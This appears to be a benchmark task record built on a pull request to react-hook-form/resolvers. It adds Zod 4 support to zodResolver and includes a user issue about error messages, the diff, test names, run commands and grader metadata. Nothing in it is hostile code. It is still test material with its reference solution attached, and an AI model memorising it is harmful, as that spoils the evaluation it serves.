"ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false", "vine/src/__tests__/Form.tsx > form's validation with Vine and TypeScript's integration", "yup/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "fluentvalidation-ts/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "ajv/src/__tests__/Form.tsx > form's validation with Ajv and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when validation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when requirement fails", "superstruct/src/__tests__/Form.tsx > form's validation with Superstruct and TypeScript's integration", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true", "zod/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "vine/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "joi/src/__tests__/Form.tsx > form's validation with Joi and TypeScript's integration", "typanion/src/__tests__/Form.tsx > form's validation with Typanion and TypeScript's integration", "fluentvalidation-ts/src/__tests__/Form-native-validation.tsx > form's native validation with fluentvalidation-ts", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized message when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized message for all validation failures", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized error message when requirement fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when requirement fails", "yup/src/__tests__/Form-native-validation.tsx > form's native validation with Yup", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when some property is undefined and result will keep the input data structure", "joi/src/__tests__/Form-native-validation.tsx > form's native validation with Joi", "typanion/src/__tests__/Form-native-validation.tsx > form's native validation with Typanion", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when requirement fails", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for an exact intersection type error object", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for a branded intersection", "typebox/src/__tests__/Form.tsx > form's validation with Typebox and TypeScript's integration", "arktype/src/__tests__/Form.tsx > form's validation with arkType and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when requirement fails", "nope/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "vest/src/__tests__/Form.tsx > form's validation with Vest and TypeScript's integration", "arktype/src/__tests__/Form-native-validation.tsx > form's native validation with Arktype", "class-validator/src/__tests__/Form-native-validation.tsx > form's native validation with Class Validator", "zod/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for the error when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for the error when requirement fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for the error when some properties are undefined", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values as a raw object from classValidatorResolver when `rawValues` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver with `mode: sync` when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver with `mode: sync` when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "typebox/src/__tests__/Form-native-validation-compiler.tsx > form's native validation with Typebox (with compiler)", "class-validator/src/__tests__/class-validator.ts > validate data with transformer option", "class-validator/src/__tests__/class-validator.ts > validate data with validator option", "class-validator/src/__tests__/class-validator.ts > should return from classValidatorResolver with `excludeExtraneousValues` set to true", "class-validator/src/__tests__/Form.tsx > form's validation with Class Validator and TypeScript's integration", "vest/src/__tests__/Form-native-validation.tsx > form's native validation with Vest", "nope/src/__tests__/Form-native-validation.tsx > form's native validation with Nope", "typebox/src/__tests__/Form-native-validation.tsx > form's native validation with Typebox", "typebox/src/__tests__/Form-compiler.tsx > form's validation with Typebox (with compiler) and TypeScript's integration", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return values from effectTsResolver when validation pass", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return a single error from effectTsResolver when validation fails", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return the first error from effectTsResolver when validation fails with `validateAllFieldCriteria` set to firstError", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return all the errors from effectTsResolver when validation fails with `validateAllFieldCriteria` set to true", "ajv/src/__tests__/Form-native-validation.tsx > form's native validation with Ajv", "io-ts/src/__tests__/Form.tsx > form's validation with io-ts and TypeScript's integration", "io-ts/src/__tests__/Form-native-validation.tsx > form's native validation with io-ts", "effect-ts/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "valibot/src/__tests__/valibot.ts > valibotResolver > should return parsed values from valibotResolver with `mode: sync` when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver with `mode: sync` when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass & raw=true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "valibot/src/__tests__/valibot.ts > valibotResolver > should be able to validate variants without errors", "valibot/src/__tests__/valibot.ts > valibotResolver > should be able to validate variants with errors", "effect-ts/src/__tests__/Form-native-validation.tsx > form's native validation with effect-ts", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver with `mode: sync` when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should call a suite with values, validated field names and a context as arguments", "zod/src/__tests__/zod.ts > zodResolver > should return values from zodResolver when validation pass & raw=true", "zod/src/__tests__/zod.ts > zodResolver > should return parsed values from zodResolver with `mode: sync` when validation pass", "zod/src/__tests__/zod.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return a single error from zodResolver with `mode: sync` when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "zod/src/__tests__/zod.ts > zodResolver > should throw any error unrelated to Zod", "vine/src/__tests__/vine.ts > vineResolver > should return values from vineResolver when validation pass", "vine/src/__tests__/vine.ts > vineResolver > should return a single error from vineResolver when validation fails", "vine/src/__tests__/vine.ts > vineResolver > should return all the errors from vineResolver when validation fails with `validateAllFieldCriteria` set to true", "vine/src/__tests__/vine.ts > vineResolver > should return values from vineResolver when validation pass & raw=true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object", "src/__tests__/toNestErrors.ts > transforms flat object to nested object and shouldUseNativeValidation: true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with names option", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with root error for field array", "src/__tests__/toNestErrors.ts > ensures consistent ordering when a field array has a root error and an error in the non-first element", "src/__tests__/validateFieldsNatively.ts > validates natively fields", "typanion/src/__tests__/typanion.ts > typanionResolver > should return values from typanionResolver when validation pass", "typanion/src/__tests__/typanion.ts > typanionResolver > should return a single error from typanionResolver when validation fails", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from fluentValidationResolver when validation pass", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from fluentValidationResolver with `mode: sync` when validation pass", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return a single error from fluentValidationResolver when validation fails", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return a single error from fluentValidationResolver with `mode: sync` when validation fails", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return all the errors from fluentValidationResolver when validation fails with `validateAllFieldCriteria` set to true", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return all the errors from fluentValidationResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from fluentValidationResolver when validation pass & raw=true", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return values from computedTypesResolver when validation pass", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return a single error from computedTypesResolver when validation fails", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should throw any error unrelated to computed-types", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return values from ioTsResolver when validation pass", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return a single error from ioTsResolver when validation fails", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return all the errors from ioTsResolver when validation fails with `validateAllFieldCriteria` set to true", "nope/src/__tests__/nope.ts > nopeResolver > should return values from nopeResolver when validation pass", "nope/src/__tests__/nope.ts > nopeResolver > should return a single error from nopeResolver when validation fails", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return a single error from superstructResolver when validation fails", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass & raw=true", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should validate with success", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox.ts > typeboxResolver > should validate with success", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return values from arktypeResolver when validation pass & raw=true", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return a single error from arktypeResolver when validation fails" ]
Function: standardSchemaResolver<Schema extends StandardSchemaV1<FieldValues>>(schema: Schema, resolverOptions?: { raw?: boolean }) Location: exported from `standard-schema/src/standard-schema.ts` Inputs: - `schema`: a Standard Schema V1 definition whose `~standard.validate` method is used for validation. - `resolverOptions` (optional): object with a boolean `raw` flag (currently unsupported, kept for signature compatibility). - Returned resolver function receives:   - `values`: the form data (`FieldValues`).   - `_`: placeholder for context (unused).   - `options`: `ResolverOptions` from React Hook Form (e.g., `fields`, `shouldUseNativeValidation`). Outputs: - Returns a `Resolver` whose resolved value conforms to `StandardSchemaV1.InferOutput<Schema>`, i.e., an object `{ errors: Record<string, FieldError>, values: Partial<TFieldValues> }`. - If validation fails, `errors` contains field‑wise `FieldError` objects; otherwise `values` holds the validated data. Description: Creates a React Hook Form resolver that validates form data using a Standard Schema V1 specification. The resolver extracts error paths using `getDotPath` to correctly handle path segments that may be objects, making it suitable for schemas that emit complex path information. It is explicitly exercised in tests via `standardSchemaResolver(customSchema)(validData, undefined, { fields, shouldUseNativeValidation })`.
MIT
{ "base_image_name": "node_20", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx vitest run --reporter=verbose --color=false" }
{ "num_modified_files": 4, "num_modified_lines": 10, "pr_author": "EskiMojo14", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue asks to correctly handle path segments that are objects by using getDotPath from @standard-schema/utils. The tests add a custom schema with object path segments and verify the resolver returns errors with proper field names, matching the described behavior. Tests align with the requirement and no unrelated test interactions are introduced. There are no signals of B‑category problems, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3bc2ad50a63ef8c114336403f182a32e2df7552d
2025-06-05 02:44:16
Jamess-Lucass: I've noticed the error messages returned from the form errors has changed when referencing zod/v4. ```typescript import { useForm } from "react-hook-form"; import { zodResolver } from "@hookform/resolvers/zod"; import { z } from "zod"; const formSchema = z.object({ firstname: z.string().max(2), }); type FormData = z.infer<typeof formSchema>; function App() { const { register, handleSubmit, formState: { errors, isSubmitting }, } = useForm<FormData>({ resolver: zodResolver(formSchema), }); const onSubmit = (data: FormData) => { console.log("Form data:", data); }; return ( <div> <form onSubmit={handleSubmit(onSubmit)}> <label>First Name:</label> <input id="firstname" type="text" {...register("firstname")} /> <button type="submit" disabled={isSubmitting}> Submit </button> </form> <p>{errors.firstname?.message}</p> </div> ); } export default App; ``` The the input "longer_than_2_chars" `errors.firstname?.message` would return "String must contain at most 2 character(s)", which i would expect. when updating the import to `import { z } from "zod/v4";` `errors.firstname?.message` now just returns "Invalid input". It doesn't seem to get the underlying zod error message anymore.
react-hook-form__resolvers-777
diff --git a/README.md b/README.md index 9ae0fd4..9fa6f4d 100644 --- a/README.md +++ b/README.md @@ -68,7 +68,7 @@ Example: ```tsx import { useForm } from 'react-hook-form'; import { zodResolver } from '@hookform/resolvers/zod'; -import { z } from 'zod'; +import { z } from 'zod'; // or 'zod/v4' const schema = z.object({ id: z.number(), @@ -175,7 +175,7 @@ const App = () => { }; ``` -### [Zod](https://github.com/vriad/zod) +### [Zod](https://github.com/colinhacks/zod) TypeScript-first schema validation with static type inference @@ -186,7 +186,7 @@ TypeScript-first schema validation with static type inference ```tsx import { useForm } from 'react-hook-form'; import { zodResolver } from '@hookform/resolvers/zod'; -import { z } from 'zod'; +import { z } from 'zod'; // or 'zod/v4' const schema = z.object({ name: z.string().min(1, { message: 'Required' }), diff --git a/bun.lock b/bun.lock index 529290a..6fbd1cf 100644 --- a/bun.lock +++ b/bun.lock @@ -54,7 +54,7 @@ "vite-tsconfig-paths": "^5.1.4", "vitest": "^3.0.9", "yup": "^1.6.1", - "zod": "^3.24.2", + "zod": "^3.25.0", }, "peerDependencies": { "react-hook-form": "^7.55.0", @@ -1444,7 +1444,7 @@ "yup": ["yup@1.6.1", "", { "dependencies": { "property-expr": "^2.0.5", "tiny-case": "^1.0.3", "toposort": "^2.0.2", "type-fest": "^2.19.0" } }, "sha512-JED8pB50qbA4FOkDol0bYF/p60qSEDQqBD0/qeIrUCG1KbPBIQ776fCUNb9ldbPcSTxA69g/47XTo4TqWiuXOA=="], - "zod": ["zod@3.24.2", "", {}, "sha512-lY7CDW43ECgW9u1TcT3IoXHflywfVqDYze4waEz812jR/bZ8FHDsl7pFQoSZTz5N+2NqRXs8GBwnAwo3ZNxqhQ=="], + "zod": ["zod@3.25.51", "", {}, "sha512-TQSnBldh+XSGL+opiSIq0575wvDPqu09AqWe1F7JhUMKY+M91/aGlK4MhpVNO7MgYfHcVCB1ffwAUTJzllKJqg=="], "@asamuzakjp/css-color/lru-cache": ["lru-cache@10.4.3", "", {}, "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ=="], diff --git a/package.json b/package.json index e6cfb9d..7319445 100644 --- a/package.json +++ b/package.json @@ -314,7 +314,7 @@ "vite-tsconfig-paths": "^5.1.4", "vitest": "^3.0.9", "yup": "^1.6.1", - "zod": "^3.24.2" + "zod": "^3.25.0" }, "peerDependencies": { "react-hook-form": "^7.55.0" diff --git a/typeschema/src/typeschema.ts b/typeschema/src/typeschema.ts index 0891a57..bba859b 100644 --- a/typeschema/src/typeschema.ts +++ b/typeschema/src/typeschema.ts @@ -1,4 +1,5 @@ import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; +import { StandardSchemaV1 } from '@standard-schema/spec'; import { FieldError, FieldErrors, @@ -6,7 +7,6 @@ import { Resolver, appendErrors, } from 'react-hook-form'; -import { StandardSchemaV1 } from 'zod/lib/standard-schema'; const parseErrorSchema = ( typeschemaErrors: readonly StandardSchemaV1.Issue[], diff --git a/zod/src/zod.ts b/zod/src/zod.ts index 064dcfd..0e227eb 100644 --- a/zod/src/zod.ts +++ b/zod/src/zod.ts @@ -8,13 +8,29 @@ import { ResolverSuccess, appendErrors, } from 'react-hook-form'; -import { ZodError, z } from 'zod'; +import * as z3 from 'zod/v3'; +import * as z4 from 'zod/v4/core'; -const isZodError = (error: any): error is ZodError => - Array.isArray(error?.errors); +const isZod3Error = (error: any): error is z3.ZodError => { + return Array.isArray(error?.issues); +}; +const isZod3Schema = (schema: any): schema is z3.ZodSchema => { + return ( + '_def' in schema && + typeof schema._def === 'object' && + 'typeName' in schema._def + ); +}; +const isZod4Error = (error: any): error is z4.$ZodError => { + // instanceof is safe in Zod 4 (uses Symbol.hasInstance) + return error instanceof z4.$ZodError; +}; +const isZod4Schema = (schema: any): schema is z4.$ZodType => { + return '_zod' in schema && typeof schema._zod === 'object'; +}; -function parseErrorSchema( - zodErrors: z.ZodIssue[], +function parseZod3Issues( + zodErrors: z3.ZodIssue[], validateAllFieldCriteria: boolean, ) { const errors: Record<string, FieldError> = {}; @@ -63,37 +79,156 @@ function parseErrorSchema( return errors; } +function parseZod4Issues( + zodErrors: z4.$ZodIssue[], + validateAllFieldCriteria: boolean, +) { + const errors: Record<string, FieldError> = {}; + // const _zodErrors = zodErrors as z4.$ZodISsue; // + for (; zodErrors.length; ) { + const error = zodErrors[0]; + const { code, message, path } = error; + const _path = path.join('.'); + + if (!errors[_path]) { + if (error.code === 'invalid_union') { + const unionError = error.errors[0][0]; + + errors[_path] = { + message: unionError.message, + type: unionError.code, + }; + } else { + errors[_path] = { message, type: code }; + } + } + + if (error.code === 'invalid_union') { + error.errors.forEach((unionError) => + unionError.forEach((e) => zodErrors.push(e)), + ); + } + + if (validateAllFieldCriteria) { + const types = errors[_path].types; + const messages = types && types[error.code]; + + errors[_path] = appendErrors( + _path, + validateAllFieldCriteria, + errors, + code, + messages + ? ([] as string[]).concat(messages as string[], error.message) + : error.message, + ) as FieldError; + } + + zodErrors.shift(); + } + + return errors; +} + +type RawResolverOptions = { + mode?: 'async' | 'sync'; + raw: true; +}; +type NonRawResolverOptions = { + mode?: 'async' | 'sync'; + raw?: false; +}; + +// minimal interfaces to avoid asssignability issues between versions +interface Zod3Type<O = unknown, I = unknown> { + _output: O; + _input: I; + _def: { + typeName: string; + }; +} + +// some type magic to make versions pre-3.25.0 still work +type IsUnresolved<T> = PropertyKey extends keyof T ? true : false; +type UnresolvedFallback<T, Fallback> = IsUnresolved<typeof z3> extends true + ? Fallback + : T; +type FallbackIssue = { + code: string; + message: string; + path: (string | number)[]; +}; +type Zod3ParseParams = UnresolvedFallback< + z3.ParseParams, + // fallback if user is on <3.25.0 + { + path?: (string | number)[]; + errorMap?: ( + iss: FallbackIssue, + ctx: { + defaultError: string; + data: any; + }, + ) => { message: string }; + async?: boolean; + } +>; +type Zod4ParseParams = UnresolvedFallback< + z4.ParseContext<z4.$ZodIssue>, + // fallback if user is on <3.25.0 + { + readonly error?: ( + iss: FallbackIssue, + ) => null | undefined | string | { message: string }; + readonly reportInput?: boolean; + readonly jitless?: boolean; + } +>; + export function zodResolver<Input extends FieldValues, Context, Output>( - schema: z.ZodSchema<Output, any, Input>, - schemaOptions?: Partial<z.ParseParams>, - resolverOptions?: { - mode?: 'async' | 'sync'; - raw?: false; - }, + schema: Zod3Type<Output, Input>, + schemaOptions?: Zod3ParseParams, + resolverOptions?: NonRawResolverOptions, ): Resolver<Input, Context, Output>; - export function zodResolver<Input extends FieldValues, Context, Output>( - schema: z.ZodSchema<Output, any, Input>, - schemaOptions: Partial<z.ParseParams> | undefined, - resolverOptions: { - mode?: 'async' | 'sync'; - raw: true; - }, + schema: Zod3Type<Output, Input>, + schemaOptions: Zod3ParseParams | undefined, + resolverOptions: RawResolverOptions, ): Resolver<Input, Context, Input>; - +// the Zod 4 overloads need to be generic for complicated reasons +export function zodResolver< + Input extends FieldValues, + Context, + Output, + T extends z4.$ZodType<Output, Input> = z4.$ZodType<Output, Input>, +>( + schema: T, + schemaOptions?: Zod4ParseParams, // already partial + resolverOptions?: NonRawResolverOptions, +): Resolver<z4.input<T>, Context, z4.output<T>>; +export function zodResolver< + Input extends FieldValues, + Context, + Output, + T extends z4.$ZodType<Output, Input> = z4.$ZodType<Output, Input>, +>( + schema: z4.$ZodType<Output, Input>, + schemaOptions: Zod4ParseParams | undefined, // already partial + resolverOptions: RawResolverOptions, +): Resolver<z4.input<T>, Context, z4.input<T>>; /** * Creates a resolver function for react-hook-form that validates form data using a Zod schema - * @param {z.ZodSchema<Input>} schema - The Zod schema used to validate the form data - * @param {Partial<z.ParseParams>} [schemaOptions] - Optional configuration options for Zod parsing + * @param {z3.ZodSchema<Input>} schema - The Zod schema used to validate the form data + * @param {Partial<z3.ParseParams>} [schemaOptions] - Optional configuration options for Zod parsing * @param {Object} [resolverOptions] - Optional resolver-specific configuration * @param {('async'|'sync')} [resolverOptions.mode='async'] - Validation mode. Use 'sync' for synchronous validation * @param {boolean} [resolverOptions.raw=false] - If true, returns the raw form values instead of the parsed data - * @returns {Resolver<z.output<typeof schema>>} A resolver function compatible with react-hook-form + * @returns {Resolver<z3.output<typeof schema>>} A resolver function compatible with react-hook-form * @throws {Error} Throws if validation fails with a non-Zod error * @example - * const schema = z.object({ - * name: z.string().min(2), - * age: z.number().min(18) + * const schema = z3.object({ + * name: z3.string().min(2), + * age: z3.number().min(18) * }); * * useForm({ @@ -101,41 +236,80 @@ export function zodResolver<Input extends FieldValues, Context, Output>( * }); */ export function zodResolver<Input extends FieldValues, Context, Output>( - schema: z.ZodSchema<Output, any, Input>, - schemaOptions?: Partial<z.ParseParams>, + schema: object, + schemaOptions?: object, resolverOptions: { mode?: 'async' | 'sync'; raw?: boolean; } = {}, ): Resolver<Input, Context, Output | Input> { - return async (values: Input, _, options) => { - try { - const data = await schema[ - resolverOptions.mode === 'sync' ? 'parse' : 'parseAsync' - ](values, schemaOptions); - - options.shouldUseNativeValidation && validateFieldsNatively({}, options); - - return { - errors: {} as FieldErrors, - values: resolverOptions.raw ? Object.assign({}, values) : data, - } satisfies ResolverSuccess<Output | Input>; - } catch (error) { - if (isZodError(error)) { + if (isZod3Schema(schema)) { + return async (values: Input, _, options) => { + try { + const data = await schema[ + resolverOptions.mode === 'sync' ? 'parse' : 'parseAsync' + ](values, schemaOptions); + + options.shouldUseNativeValidation && + validateFieldsNatively({}, options); + return { - values: {}, - errors: toNestErrors( - parseErrorSchema( - error.errors, - !options.shouldUseNativeValidation && - options.criteriaMode === 'all', + errors: {} as FieldErrors, + values: resolverOptions.raw ? Object.assign({}, values) : data, + } satisfies ResolverSuccess<Output | Input>; + } catch (error) { + if (isZod3Error(error)) { + return { + values: {}, + errors: toNestErrors( + parseZod3Issues( + error.errors, + !options.shouldUseNativeValidation && + options.criteriaMode === 'all', + ), + options, ), - options, - ), - } satisfies ResolverError<Input>; + } satisfies ResolverError<Input>; + } + + throw error; } + }; + } - throw error; - } - }; + if (isZod4Schema(schema)) { + return async (values: Input, _, options) => { + try { + const parseFn = + resolverOptions.mode === 'sync' ? z4.parse : z4.parseAsync; + const data: any = await parseFn(schema, values, schemaOptions); + + options.shouldUseNativeValidation && + validateFieldsNatively({}, options); + + return { + errors: {} as FieldErrors, + values: resolverOptions.raw ? Object.assign({}, values) : data, + } satisfies ResolverSuccess<Output | Input>; + } catch (error) { + if (isZod4Error(error)) { + return { + values: {}, + errors: toNestErrors( + parseZod4Issues( + error.issues, + !options.shouldUseNativeValidation && + options.criteriaMode === 'all', + ), + options, + ), + } satisfies ResolverError<Input>; + } + + throw error; + } + }; + } + + throw new Error('Invalid input: not a Zod schema'); }
feat: support Zod 4 Per some discussions I've been having with @bluebill1049, this PR adds support for Zod 4. The other PR by @alexcraviotto (https://github.com/react-hook-form/resolvers/pull/776) is really solid but we decided to go another direction. - This PR bumps the minimum Zod version to `3.25.0` - With this change, it;s possible to support both Zod 3 and Zod 4 in a single `zodResolver` (via Zod's [subpath versioning](https://github.com/colinhacks/zod/issues/4371) scheme) - I've designed this to continue working with Zod versions pre-3.25.0, but it's on a best-effort basis. For instance, you won't get perfect type signatures on parse params (the second argument to `zodResolver`). There were zero breaking changes between Zod 3.24 and Zod 3.25 so there's no reason not to upgrade. Both Zod 3 and Zod 4 schemas can be passed into `zodResolver()`: ```ts import { zodResolver } from "@hookform/resolvers"; import * as z3 from "zod/v3"; // or just "zod" import * as z4 from "zod/v4"; const oldResolver = zodResolver(z3.object({ name: z.string() })); const newResolver = zodResolver(z4.object({ name: z.string() })); ```
**Title** Add Zod 4 compatibility to the Zod resolver **Problem** The resolver currently only supports Zod 3, so projects that upgrade to Zod 4 lose the ability to use `zodResolver`. The documentation and package metadata also reference the older Zod repository and version range, which can mislead users. **Root Cause** The resolver’s implementation and type signatures are tightly coupled to Zod 3’s error format, parsing API, and module path, and the package’s peer‑dependency pins an older Zod version. **Fix / Expected Behavior** - Update documentation to show that either the default Zod import or the `zod/v4` sub‑path can be used with the resolver. - Bump the Zod peer‑dependency to a version that includes the 3.25.0‑plus range, enabling the sub‑path versioning scheme. - Add runtime detection of the Zod major version and route validation through the appropriate parsing and error‑handling logic for both Zod 3 and Zod 4. - Provide overloads so TypeScript infers the correct input and output types regardless of the Zod version used. - Adjust the repository lockfile and README link to point to the official Zod repository. **Risk & Validation** - Ensure that existing projects using Zod 3 continue to receive correct type inference and error messages (fallback logic is exercised for versions < 3.25.0). - Verify that schemas built with Zod 4 are parsed correctly and that native validation still respects the resolver options. - Run the full test suite and add basic integration tests for both Zod 3 and Zod 4 schemas to catch any version‑detection regressions.
777
react-hook-form/resolvers
